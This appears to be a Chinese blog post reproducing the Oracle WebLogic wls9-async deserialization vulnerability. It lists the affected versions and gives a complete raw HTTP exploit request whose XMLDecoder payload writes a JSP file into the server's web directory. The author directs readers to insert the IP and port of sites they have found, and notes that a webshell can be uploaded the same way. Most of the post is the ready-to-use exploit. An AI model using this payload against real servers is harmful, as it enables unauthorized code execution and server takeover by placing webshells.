前天刚刚爆出了WebLogic wls9-async 反序列化漏洞,大佬们又可以薅羊毛了,这是我的复现过程,仅供参考
影响范围
- Oracle WebLogic Server10.3.6.0.0
- Oracle WebLogic Server12.1.3.0.0
- Oracle WebLogic Server12.2.1.1.0
- Oracle WebLogic Server12.2.1.2.0
复现过程(很简单)
EXP请求包如下
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 714
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.xmlDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/sh.jsp</string><void method="println"><string><![CDATA[456]]></string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
输入你找到网站的ip和端口
这个时候你上传的文件sh.jsp内容为456就会上传到下面的目录里面
http://ip:port/bea_wls_internal/sh.jsp
然后我们访问url
这个只是输出 我们也可以上传shell
